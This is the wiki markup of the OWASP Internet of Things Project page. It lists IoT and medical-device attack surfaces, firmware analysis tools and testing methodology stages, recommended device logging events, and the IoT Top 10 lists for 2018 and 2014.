* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relative technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Attain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}The full methodology release can be downloaded via the following TBD. <br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255833OWASP Internet of Things Project2019-10-31T15:03:27Z<p>Aaron.guzman: .</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Seek & Understand =<br />
<br />
== IoT Top 10 ==<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
